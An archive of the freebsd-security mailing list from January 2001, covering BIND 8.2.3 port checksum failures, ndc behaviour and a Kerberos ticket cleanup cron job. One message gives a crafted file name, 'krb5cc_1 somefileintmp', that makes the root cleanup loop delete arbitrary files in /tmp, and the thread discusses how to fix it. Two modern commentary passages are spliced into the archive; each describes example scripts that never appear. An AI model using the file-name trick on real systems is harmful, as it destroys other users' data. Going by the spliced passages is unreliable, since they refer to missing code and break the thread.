From: Borja Marcos X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: bind8.2.3 and installation problem References: <20010130012616.J91447@rfx-216-196-73-168.users.reflex> <20010130021201.B44770@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Tue, Jan 30, 2001 at 11:52:14AM +0200, Justin Stanford wrote: > > Does your bind8 port actually work? > > > > I cvsupped from cvsup.freebsd.org and downloaded the distfiles from > > ftp.freebsd.org and I'm getting checksum mismatches (bypassing causes > > patch failure) - so I simply can't get the port to go ahead and > > compile/install.. - I also tried rm'ing the bind8 directory and freshly > > cvsupping it - no go. > > It built when I downloaded it after cvsup on a fresh machine earlier > tonight (not the one I built/committed on). Anyone else seeing this? It seems that the distfiles at ftp.freebsd.org are not updated. I got them from ftp.isc.org and it worked. They don't use to put the version number in the tarballs... Borja. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:16:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 2AB4437B69B for ; Tue, 30 Jan 2001 02:16:03 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id C284EBA2B4; Tue, 30 Jan 2001 02:16:32 -0800 (PST) Date: Tue, 30 Jan 2001 02:16:32 -0800 
From: Kris Kennaway To: Kris Kennaway Cc: Justin Stanford , cjclark@alum.mit.edu, security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010130021632.C44770@xor.obsecurity.org> References: <20010130012616.J91447@rfx-216-196-73-168.users.reflex> <20010130021201.B44770@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="VywGB/WGlW4DM4P8" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010130021201.B44770@xor.obsecurity.org>; from kris@obsecurity.org on Tue, Jan 30, 2001 at 02:12:01AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --VywGB/WGlW4DM4P8 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jan 30, 2001 at 02:12:01AM -0800, Kris Kennaway wrote: > On Tue, Jan 30, 2001 at 11:52:14AM +0200, Justin Stanford wrote: > > Does your bind8 port actually work? > >=20 > > I cvsupped from cvsup.freebsd.org and downloaded the distfiles from > > ftp.freebsd.org and I'm getting checksum mismatches (bypassing causes > > patch failure) - so I simply can't get the port to go ahead and > > compile/install.. - I also tried rm'ing the bind8 directory and freshly > > cvsupping it - no go. >=20 > It built when I downloaded it after cvsup on a fresh machine earlier > tonight (not the one I built/committed on). Anyone else seeing this? I just blew away my port, re-cvs updated it, and re-fetched the distfiles. Everything still looks okay, I'd check whether you're actually up-to-date. 
Kris --VywGB/WGlW4DM4P8 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dpSAWry0BWjoQKURAoLQAJ4+5Sjsln+o7xA7RBV0DC+TGfisgwCgoylw +BQWXB1FO60FRrKYyaiHJnk= =DL2/ -----END PGP SIGNATURE----- --VywGB/WGlW4DM4P8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:19:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 9B6AB37B6A5 for ; Tue, 30 Jan 2001 02:18:58 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id E74CDBA2B4; Tue, 30 Jan 2001 02:19:28 -0800 (PST) Date: Tue, 30 Jan 2001 02:19:28 -0800 
From: Kris Kennaway To: Alex Charalabidis Cc: Justin Stanford , cjclark@alum.mit.edu, security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010130021928.A47944@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="sdtB3X0nJg68CQEu" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from alex@wnm.net on Tue, Jan 30, 2001 at 04:12:11AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --sdtB3X0nJg68CQEu Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jan 30, 2001 at 04:12:11AM -0600, Alex Charalabidis wrote: > >> Attempting to fetch from ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distf= iles/. > Receiving bind-src.tar.gz (1256951 bytes): 14%C >=20 > Conclusion: Distfiles have not been updated and ftp.freebsd.org > still carries P7. There's your checksum mismatch. Ah yes, if you have old copies of the distfiles in your /usr/ports/distfiles they'll be used instead of fetching new ones, since the filename is the same. Remove them and let the port download fresh ones. 
rm /usr/ports/distfiles/bind-src.tar.gz /usr/ports/distfiles/bind-doc.tar.gz

Kris

--sdtB3X0nJg68CQEu
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6dpUwWry0BWjoQKURAhMaAKD17vFOmBE5Ok7f6/WuV8f/hEW3XACg8qo/
Y9On6ck7Zptev/glwR7igWc=
=U9WZ
-----END PGP SIGNATURE-----

--sdtB3X0nJg68CQEu--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jan 30 2:21:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 5A97837B6B5 for ; Tue, 30 Jan 2001 02:21:23 -0800 (PST)
Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 14NXuV-0000B8-00; Tue, 30 Jan 2001 12:21:15 +0200
Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id MAA17166; Tue, 30 Jan 2001 12:21:13 +0200 (SAST)
Received: by nwl.fw.uunet.co.za via recvmail id 16961; Tue Jan 30 12:20:43 2001
Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.20 #1) id 14NXty-00023O-00; Tue, 30 Jan 2001 12:20:42 +0200
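The checksum mismatch traced above (Alex's fetch log and Kris's explanation) is the ports framework doing its job: a file already sitting in /usr/ports/distfiles is picked up by name, and only the digest comparison against the port's checksum file (distinfo) reveals that bind-src.tar.gz is the old 8.2.2-P7 tarball rather than 8.2.3. The following is an added stand-alone reimplementation of that check, example code rather than bsd.port.mk itself, written for the `MD5 (file) = hash` line format those checksum files use. The distinfo contents and distfile contents in the usage are constructed stand-ins (the digests are of the strings "hello" and ""), and the md5sum/md5/openssl fallback is an assumption about which digest tool is installed on the machine running it.

```shell
#!/bin/sh
# Added example: verify a distfile against a ports-style checksum file.
# Same idea as the check the ports framework runs after "make fetch":
# a file present under the distfiles directory is trusted by name only
# until its digest matches the recorded one, which is what exposes a
# stale bind-src.tar.gz left over from a previous release.

# Print the MD5 digest of "$1" with whichever tool is installed
# (md5sum on Linux, md5 on FreeBSD, openssl as a last resort).
hash_file() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | cut -d' ' -f1
    elif command -v md5 >/dev/null 2>&1; then
        md5 -q "$1"
    else
        openssl dgst -md5 "$1" | sed 's/.*= //'
    fi
}

# Look up the recorded digest for distfile "$2" in checksum file "$1".
# Lines look like:  MD5 (bind-src.tar.gz) = <32 hex digits>
# The file name is matched exactly, not as a pattern.
expected_md5() {
    awk -v name="$2" '$1 == "MD5" && $2 == ("(" name ")") { print $4 }' "$1"
}

# check_distfile DISTINFO DISTDIR NAME
# Returns 0 when DISTDIR/NAME matches the recorded digest, 1 on a
# mismatch, 2 when there is no entry for NAME, 3 when the file is absent.
check_distfile() {
    distinfo=$1
    distdir=$2
    name=$3
    expected=$(expected_md5 "$distinfo" "$name")
    if [ -z "$expected" ]; then
        echo "$name: no MD5 entry in $distinfo" >&2
        return 2
    fi
    if [ ! -f "$distdir/$name" ]; then
        echo "$name: not present in $distdir, fetch it first" >&2
        return 3
    fi
    actual=$(hash_file "$distdir/$name")
    if [ "$actual" = "$expected" ]; then
        echo "$name: checksum OK"
        return 0
    fi
    # Same file name, different contents: usually an old distfile from a
    # previous version. Remove it and let the port fetch a fresh copy.
    echo "$name: checksum mismatch (expected $expected, got $actual);" \
         "remove $distdir/$name and refetch" >&2
    return 1
}
```

Bypassing the check (as the first message in this thread tried) is never the answer: it trades a loud failure for a silent build of whatever happened to be on disk, which here would have been the very release the advisory told people to stop running.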
From: Sheldon Hearn
To: Stu Pidaso
Cc: "Jacques A. Vidrine" , freebsd-security@freebsd.org
Subject: Re: cvs commit: src/usr.bin/login login.c
In-reply-to: Your message of "Tue, 30 Jan 2001 05:08:09 EST."
Date: Tue, 30 Jan 2001 12:20:42 +0200
Message-ID: <7897.980850042@axl.fw.uunet.co.za>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 30 Jan 2001 05:08:09 EST, Stu Pidaso wrote:

> > # Destroy all stale Kerberos5 tickets
> > #
> > for i in `find /tmp -name 'krb5cc_*' -ctime +1 -print` ; do
> > rm -f $i
> > done
>
> and now you can delete any file in /tmp.
>
> touch 'krb5cc_1 somefileintmp' and wait.

Well spotted.

find /tmp -name 'krb5cc_*' -ctime +1 -exec rm -f {} \;

I don't use -delete because it's not portable.

Of course, the problem is that maximum ticket lifetime is a
site-configurable value, which is why it _doesn't_ make sense to put this
job in /etc/crontab in the base system. The problem is that you can
end up with a large number of stale files in /tmp if you rely on users
to run kdestroy religiously.

Ciao,
Sheldon.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jan 30 2:22:30 2001
Delivered-To: freebsd-security@freebsd.org
Received: from orhi.sarenet.es (orhi.sarenet.es [192.148.167.5]) by hub.freebsd.org (Postfix) with ESMTP id 77DC737B6B7 for ; Tue, 30 Jan 2001 02:22:04 -0800 (PST)
Received: from sarenet.es (borja.sarenet.es [192.148.167.77]) by orhi.sarenet.es (Postfix) with ESMTP id 9B7DB4A1D for ; Tue, 30 Jan 2001 11:22:00 +0100 (MET)
Message-ID: <3A7695CB.7E2F7CBB@sarenet.es>
Date: Tue, 30 Jan 2001 11:22:03 +0100
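The exchange above is the shell word-splitting bug in miniature: the output of the command substitution is split on whitespace, so a file whose name contains a space turns into two arguments to rm, and rm -f silently removes whatever the second word names relative to the job's working directory (the unquoted $i is also subject to pathname expansion, so a second word of `*` would be worse still). The following is an added example, not the base-system crontab entry and not Sheldon's exact command, that runs both versions against a private scratch directory standing in for /tmp so the effect can be seen without root. The `-ctime +1` age test is dropped here because ctime cannot be back-dated with touch; the vulnerable loop is run with the scratch directory as its working directory so that the relative second word resolves there. The decoy and victim file names are constructed.

```shell
#!/bin/sh
# Added example: how `for i in `find ...`` breaks on a crafted file name,
# and the -exec form that does not. "$1" is a scratch directory standing
# in for /tmp in every function below.

# Attacker: create a stale-looking ticket file with a space in its name.
# The second "word" is the name of a file the cleanup job must not touch.
# (A file name cannot contain "/", so the second word is necessarily
# relative to wherever the cleanup job happens to run.)
plant_decoy() {                 # $1 = tmpdir
    printf 'keep me\n' > "$1/important"
    : > "$1/krb5cc_1 important"
}

# Vulnerable cleanup, same shape as the quoted crontab entry: the command
# substitution is word-split, so "./krb5cc_1 important" becomes the two
# arguments "./krb5cc_1" and "important"; the first does not exist (-f hides
# that) and the second removes the victim. The decoy itself is never removed.
cleanup_unsafe() {              # $1 = tmpdir, used as the working directory
    ( cd "$1" || exit 1
      for i in `find . -name 'krb5cc_*' -print` ; do
          rm -f $i
      done )
}

# Fixed cleanup: find hands each matched path to rm as one argument, so
# whitespace in the name cannot split it. "{} \;" is POSIX; "-delete" is
# not, and "{} +" is the portable way to batch several names into one rm.
cleanup_safe() {                # $1 = tmpdir
    find "$1" -name 'krb5cc_*' -exec rm -f {} \;
}
```

The same reasoning applies to any `for f in $(find ...)` or `for f in $(ls ...)` loop in a privileged cron job: if an unprivileged user controls file names in the searched tree, the loop's arguments are user input.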
From: Borja Marcos X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: More bind8 ports problems Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, After installing the port (getting the correct files from ftp.isc.org), I have seen a problem: After I modify /etc/rc.conf so to use /usr/local/sbin/named, whenever I run "ndc restart" (using /usr/local/sbin/ndc), the server doesn't restart, as it is looking for named.conf in /etc. Wouldn't it be better to build it with DESTETC=/etc/namebd, so that it is easier to replace it? Another problem: I have tried to run named as a "bind" user, but if I restart it with ndc, the new named runs as "root". Borja. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:24: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id 771DE37B6B8 for ; Tue, 30 Jan 2001 02:23:41 -0800 (PST) Received: from wocker (wocker.int.nz.freebsd.org [192.168.0.99]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id XAA59099; Tue, 30 Jan 2001 23:23:10 +1300 (NZDT) Message-Id: <200101301023.XAA59099@ducky.nz.freebsd.org> 
From: "Dan Langille" Organization: The FreeBSD Diary / FreshPorts To: Kris Kennaway Date: Tue, 30 Jan 2001 23:23:07 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: bind8.2.3 and installation problem Reply-To: dan@langille.org Cc: Justin Stanford , cjclark@alum.mit.edu, security@FreeBSD.ORG In-reply-to: <20010130021928.A47944@xor.obsecurity.org> References: ; from alex@wnm.net on Tue, Jan 30, 2001 at 04:12:11AM -0600 X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30 Jan 2001, at 2:19, Kris Kennaway wrote: > On Tue, Jan 30, 2001 at 04:12:11AM -0600, Alex Charalabidis wrote: > > > >> Attempting to fetch from ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/. > > Receiving bind-src.tar.gz (1256951 bytes): 14%C > > > > Conclusion: Distfiles have not been updated and ftp.freebsd.org > > still carries P7. There's your checksum mismatch. > > Ah yes, if you have old copies of the distfiles in your > /usr/ports/distfiles they'll be used instead of fetching new ones, > since the filename is the same. Remove them and let the port download > fresh ones. > > rm /usr/ports/distfiles/bind-src.tar.gz /usr/ports/distfiles/bind-doc.tar.gz I didn't have the tarballs (they were removed previously). The fetch/extract port worked for me. Will report later on the build, I'm off to bed now. 
-- Dan Langille pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:26:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.wnm.net (earth.wnm.net [208.246.240.243]) by hub.freebsd.org (Postfix) with ESMTP id 4C83837B6B1 for ; Tue, 30 Jan 2001 02:26:03 -0800 (PST) Received: (from root@localhost) by earth.wnm.net (8.11.0/8.11.0) id f0UAQ5V34550; Tue, 30 Jan 2001 04:26:05 -0600 (CST) Received: from localhost (alex@localhost) by earth.wnm.net (8.11.0/8.11.0av) with ESMTP id f0UAQ4M34541; Tue, 30 Jan 2001 04:26:04 -0600 (CST) X-Authentication-Warning: earth.wnm.net: alex owned process doing -bs Date: Tue, 30 Jan 2001 04:26:03 -0600 (CST) 
From: Alex Charalabidis To: Borja Marcos Cc: freebsd-security@freebsd.org Subject: Re: More bind8 ports problems In-Reply-To: <3A7695CB.7E2F7CBB@sarenet.es> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 30 Jan 2001, Borja Marcos wrote: > > Hello, > > After installing the port (getting the correct files from > ftp.isc.org), I have seen a problem: > > After I modify /etc/rc.conf so to use /usr/local/sbin/named, > whenever I run "ndc restart" (using /usr/local/sbin/ndc), the > server doesn't restart, as it is looking for named.conf in > /etc. Wouldn't it be better to build it with DESTETC=/etc/namebd, > so that it is easier to replace it? > Don't use ndc restart with a version change. Do ndc stop and launch it manually. > Another problem: I have tried to run named as a "bind" > user, but if I restart it with ndc, the new named runs as "root". > Bad ndc behaviour. Wish I had a fix for it but haven't given it enough thought. -ac -- ============================================================== Alex Charalabidis (AC8139) 5050 Poplar Ave, Ste 170 System Administrator Memphis, TN 38157 WebNet Memphis (901) 432 6000 Author, The Book of IRC http://www.bookofirc.com/ ============================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:31:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 6E9E237B6C1 for ; Tue, 30 Jan 2001 02:31:01 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id BABEFBA2B4; Tue, 30 Jan 2001 02:31:31 -0800 (PST) Date: Tue, 30 Jan 2001 02:31:31 -0800 
From: Kris Kennaway To: Borja Marcos Cc: freebsd-security@FreeBSD.ORG Subject: Re: More bind8 ports problems Message-ID: <20010130023131.A50095@xor.obsecurity.org> References: <3A7695CB.7E2F7CBB@sarenet.es> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="5mCyUwZo2JvN/JJP" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3A7695CB.7E2F7CBB@sarenet.es>; from borjamar@sarenet.es on Tue, Jan 30, 2001 at 11:22:03AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --5mCyUwZo2JvN/JJP Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Jan 30, 2001 at 11:22:03AM +0100, Borja Marcos wrote: > After I modify /etc/rc.conf so to use /usr/local/sbin/named, > whenever I run "ndc restart" (using /usr/local/sbin/ndc), the > server doesn't restart, as it is looking for named.conf in > /etc. Wouldn't it be better to build it with DESTETC=/etc/namebd, > so that it is easier to replace it? Looks like that's where the port has always expected to find the config file. It does depart from the usual ports convention of locating config files in $PREFIX/etc, but OTOH it's in line with how people usually expect BIND to work. > Another problem: I have tried to run named as a "bind" > user, but if I restart it with ndc, the new named runs as "root". Don't know there. 
Kris --5mCyUwZo2JvN/JJP Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dpgDWry0BWjoQKURAoIvAJ4yqGCbYUpE0/tIKz+fWRRAykYMjgCdEpI7 QmwvXIUd//6h2br8Sa9q1hc= =5VRK -----END PGP SIGNATURE----- --5mCyUwZo2JvN/JJP-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:40:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from athena.za.net (athena.za.net [196.30.167.200]) by hub.freebsd.org (Postfix) with ESMTP id 9CBD337B6C5; Tue, 30 Jan 2001 02:39:47 -0800 (PST) Received: from localhost (jus@localhost) by athena.za.net (8.9.3/8.9.3) with ESMTP id KAA03052; Tue, 30 Jan 2001 10:43:21 GMT (envelope-from jus@security.za.net) X-Authentication-Warning: athena.za.net: jus owned process doing -bs Date: Tue, 30 Jan 2001 12:43:16 +0200 (SAST) 
From: Justin Stanford X-Sender: jus@athena.za.net To: Kris Kennaway Cc: questions@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: /usr/ports/net/bind8 failing checksums? In-Reply-To: <20010130023452.B50228@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Right, it works with the src files from isc's ftp - I had just assumed that with a port update ftp.freebsd.org's distfiles would be updated as well. With PREFIX=/usr and DESTECT=/etc it works perfectly as a seamless drop-in.

Regards,
Justin

-- 
Justin Stanford 082 7402741 jus@security.za.net www.security.za.net IT Security and Solutions

On Tue, 30 Jan 2001, Kris Kennaway wrote:
> On Tue, Jan 30, 2001 at 10:06:11AM +0200, Justin Stanford wrote:
> > ===> Extracting for bind-8.2.3
> > >> Checksum mismatch for bind-src.tar.gz.
> > >> Checksum mismatch for bind-doc.tar.gz.
> >
> > I've just cvsupped a fresh bind8 port from cvsup.freebsd.org and
> > downloaded the distfiles from ftp.freebsd.org - what's up with that?
>
> Remove your out of date distfiles and download the new versions - they
> have the same name as the old ones.
>
> Kris

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jan 30 2:51: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id 1D54A37B6C7; Tue, 30 Jan 2001 02:50:46 -0800 (PST) Received: from wocker (wocker.int.nz.freebsd.org [192.168.0.99]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id XAA60705; Tue, 30 Jan 2001 23:50:34 +1300 (NZDT) Message-Id: <200101301050.XAA60705@ducky.nz.freebsd.org>
From: "Dan Langille" Organization: The FreeBSD Diary / FreshPorts To: Justin Stanford Date: Tue, 30 Jan 2001 23:50:31 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: /usr/ports/net/bind8 failing checksums? Reply-To: dan@langille.org Cc: questions@FreeBSD.ORG, security@FreeBSD.ORG References: <20010130023452.B50228@xor.obsecurity.org> In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30 Jan 2001, at 12:43, Justin Stanford wrote: > Right, it works with the src files from isc's ftp - I had just assumed > that with a port update ftp.freebsd.org's distfiles would be updated > aswell. With PREFIX=/usr and DESTECT=/etc it works perfectly as a seamless > drop in. Just in case someone else tries that, should that be DESTETC? -- Dan Langille pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:52:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from athena.za.net (athena.za.net [196.30.167.200]) by hub.freebsd.org (Postfix) with ESMTP id E6D3137B6C7; Tue, 30 Jan 2001 02:51:56 -0800 (PST) Received: from localhost (jus@localhost) by athena.za.net (8.9.3/8.9.3) with ESMTP id KAA03076; Tue, 30 Jan 2001 10:55:32 GMT (envelope-from jus@security.za.net) X-Authentication-Warning: athena.za.net: jus owned process doing -bs Date: Tue, 30 Jan 2001 12:55:27 +0200 (SAST) 
From: Justin Stanford X-Sender: jus@athena.za.net To: Dan Langille Cc: questions@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: /usr/ports/net/bind8 failing checksums? In-Reply-To: <200101301050.XAA60705@ducky.nz.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Typo - thanks for the correction ;-) -- Justin Stanford 082 7402741 jus@security.za.net www.security.za.net IT Security and Solutions On Tue, 30 Jan 2001, Dan Langille wrote: > On 30 Jan 2001, at 12:43, Justin Stanford wrote: > > > Right, it works with the src files from isc's ftp - I had just assumed > > that with a port update ftp.freebsd.org's distfiles would be updated > > aswell. With PREFIX=/usr and DESTECT=/etc it works perfectly as a seamless > > drop in. > > Just in case someone else tries that, should that be DESTETC? > > -- > Dan Langille > pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 3:11: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 03AB637B503 for ; Tue, 30 Jan 2001 03:10:40 -0800 (PST) Received: (qmail 4414 invoked by uid 1000); 30 Jan 2001 11:09:03 -0000 Date: Tue, 30 Jan 2001 13:09:03 +0200 
From: Peter Pentchev To: disassembled Cc: freebsd-security@FreeBSD.ORG Subject: Re: mapping arp Message-ID: <20010130130903.E328@ringworld.oblivion.bg> Mail-Followup-To: disassembled , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from modulus@icmp.dhs.org on Mon, Jan 29, 2001 at 09:14:27PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, Jan 29, 2001 at 09:14:27PM -0600, disassembled wrote:
>
> I was wondering if there was any way I could map a MAC address back
> to its assigned IP address without using a rarpd.
>
> Something I was considering writing was a program
> that sent out a series of ARP who-has packets to the network,
> then ran a cmp on the 48-bit values that returned in the
> replies against some MAC address that would be supplied on the
> command line.
>
> If anyone knows anything about that & could help me out,
> I would be grateful.

If your system has already seen IP traffic from the machine in question, you should have its address in the kernel's ARP cache. arp -an should display it, or you could query it the way arp(1) does.

G'luck,
Peter

-- 
I am the thought you are now thinking.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jan 30 3:39: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id DA24A37B6A3 for ; Tue, 30 Jan 2001 03:38:40 -0800 (PST) Received: from wocker (wocker.int.nz.freebsd.org [192.168.0.99]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id AAA64905; Wed, 31 Jan 2001 00:38:34 +1300 (NZDT) Message-Id: <200101301138.AAA64905@ducky.nz.freebsd.org>
From: "Dan Langille" Organization: novice in training To: "Crist J. Clark" Date: Wed, 31 Jan 2001 00:38:28 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: bind8.2.3 and installation problem Reply-To: dan@langille.org Cc: security@FreeBSD.ORG In-reply-to: <20010130012616.J91447@rfx-216-196-73-168.users.reflex> References: <200101300712.UAA56104@ducky.nz.freebsd.org>; from dan@langille.org on Tue, Jan 30, 2001 at 08:12:21PM +1300 X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On 30 Jan 2001, at 1:26, Crist J. Clark wrote:
> > It can't be that simple!
>
> I hate to break it to you (I guess?), but it is. I did it on my
> CURRENT box for testing and it clobbered the old BIND quite nicely.
> Before,
>
> bubbles# ls -l /usr/sbin/named
> -r-xr-xr-x 1 root wheel 501408 Jan 18 13:17 /usr/sbin/named
>
> After,
>
> bubbles# !ls
> ls -l /usr/sbin/named
> -rwxr-xr-x 1 root wheel 595752 Jan 30 01:22 /usr/sbin/named
>
> Like I said, PREFIX rocks.

I actually tried:

     make PREFIX=/usr DESTETC=/etc install

The only catch was needing to have /etc/named.conf, so I created a symlink:

     # ln -s /etc/named.conf /etc/namedb/named.conf

I'll do more testing in the morning....
-- Dan Langille pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 5:20:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id C877437B6AB for ; Tue, 30 Jan 2001 05:20:15 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id OAA20171; Tue, 30 Jan 2001 14:20:13 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Kris Kennaway Cc: security@FreeBSD.ORG Subject: BIND 8.2.3 upgrade instructions for RELENG_3 and older systems References: <20010129143300.A38419@xor.obsecurity.org> 
